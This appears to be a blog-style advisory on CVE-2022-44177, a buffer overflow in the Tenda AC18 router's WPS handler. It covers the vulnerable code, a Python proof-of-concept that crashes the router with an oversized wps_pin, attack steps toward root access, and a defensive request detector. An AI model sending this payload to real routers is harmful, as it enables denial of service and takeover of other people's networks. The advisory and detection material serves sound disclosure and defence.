If you own or manage a Tenda AC18 router running firmware version V15.03.05.19, your device is vulnerable to a high-severity buffer overflow, tracked as CVE-2022-44177. In this guide, I’ll walk you through how this vulnerability works, share simple proof-of-concept code, link to original advisories, and explain what it means for home and small office security.
Introduction
The Tenda AC18 is a popular wireless router for homes and small businesses. Researchers found that its web management interface contains a code flaw: a buffer overflow in the formWifiWpsStart function. This kind of bug can let an attacker who is able to send crafted requests to the router hijack it, possibly gaining remote code execution. Here’s what all that means.
What is CVE-2022-44177?
CVE-2022-44177 is an official identifier for a security flaw found in the Tenda AC18 (firmware V15.03.05.19). The issue lies in how the router handles input to the formWifiWpsStart endpoint: it fails to check user-supplied data length, letting attackers overrun the buffer and crash or take control of the router.
Let’s break that down
- The buffer overflow occurs in the HTTP POST handler for the /goform/formWifiWpsStart page.
Typical stack buffer flaw
void formWifiWpsStart(request_t *req) {
    char buf[128];                 // fixed-size stack buffer
    strcpy(buf, req->wps_pin);     // No bounds check!
    ...
}
This means that if wps_pin is longer than 128 characters, it spills past the end of buf, corrupts adjacent memory, and undermines the device’s security.
The attack can be triggered from the local network (and sometimes from the Internet, if web admin is exposed).
Below is a minimal proof-of-concept exploit in Python that will crash a vulnerable Tenda AC18 router:
import requests

# Change this IP to your router’s admin address (192.168.0.1 is the usual Tenda default).
target = "http://192.168.0.1/goform/formWifiWpsStart"

payload = "A" * 256  # This string overflows the 128-byte buffer
data = {
    "wps_pin": payload
}

# Default password is often 'admin', update if changed
cookies = {"password": "admin"}

resp = requests.post(target, data=data, cookies=cookies)
print(f"Status: {resp.status_code}")
print("Check if router's web interface is still alive!")
Warning: Only do this on equipment you own. Crashing or controlling someone else’s router is illegal.
1. Attacker must be on the local network (or have internet access to the admin page).
2. A POST request is sent to /goform/formWifiWpsStart with an overly long wps_pin parameter.
3. The router’s backend code copies this long string without checking its size.
4. If the attacker knows memory layouts, they can place code in the payload, gain shell access, and control the router as root.
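As an added example (not part of the original post), here is a defender-side check that can be run over captured or proxied HTTP requests to flag traffic matching the pattern described above: a POST to /goform/formWifiWpsStart whose wps_pin would not fit the 128-byte buffer, or is not a plausible WPS PIN at all. The sample requests are constructed, the buffer size comes from the snippet above, and the 4- or 8-digit PIN format comes from the WPS specification.

```python
import re
from urllib.parse import parse_qs

VULN_PATH = "/goform/formWifiWpsStart"
BUF_SIZE = 128                         # size of the fixed stack buffer in the handler
WPS_PIN_RE = re.compile(r"^\d{4}(\d{4})?$")  # legitimate WPS PINs are 4 or 8 digits


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_wps_request(raw: bytes) -> dict:
    """Return a verdict for one request. A request is suspicious if it POSTs a
    wps_pin to the vulnerable endpoint that is too long for the buffer
    (strcpy needs len+1 bytes, so len >= 128 already overflows) or is not digits."""
    method, path, _headers, body = parse_http_request(raw)
    verdict = {"path": path, "suspicious": False, "reason": ""}
    if method != "POST" or path.split("?")[0] != VULN_PATH:
        return verdict
    form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    pins = form.get("wps_pin", [])
    if not pins:
        return verdict
    pin = pins[0]
    if len(pin) >= BUF_SIZE:
        verdict.update(suspicious=True,
                       reason=f"wps_pin length {len(pin)} >= buffer size {BUF_SIZE}")
    elif not WPS_PIN_RE.match(pin):
        verdict.update(suspicious=True, reason="wps_pin is not a 4- or 8-digit PIN")
    return verdict


# Constructed sample traffic (not captured from a real device)
BENIGN = (b"POST /goform/formWifiWpsStart HTTP/1.1\r\nHost: 192.168.0.1\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          b"wps_pin=12345670")
OVERFLOW = (b"POST /goform/formWifiWpsStart HTTP/1.1\r\nHost: 192.168.0.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
            b"wps_pin=" + b"A" * 256)

if __name__ == "__main__":
    for sample in (BENIGN, OVERFLOW):
        print(inspect_wps_request(sample))
```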
Potential Risks
- Full compromise of home/office network.
References
- Original NVD entry for CVE-2022-44177
- Exploit Database #51137
- Github PoC
- Seebug Advisory (Chinese)
Mitigation Steps
- Update: As of writing, Tenda hasn’t issued a fix. Watch for official patches here: Tenda Downloads.
Final Thoughts
CVE-2022-44177 shows how a simple coding mistake can put entire networks at risk. If you use a Tenda AC18 router, isolate its admin interface, check for firmware updates, and stay alert.
*Stay safe, patch early, and remember — security is everyone’s responsibility!*
*(You may share and reference this exclusive breakdown with credit. For responsible research, always test on your own equipment.)*
Timeline
Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/28/2022 13:48:00 UTC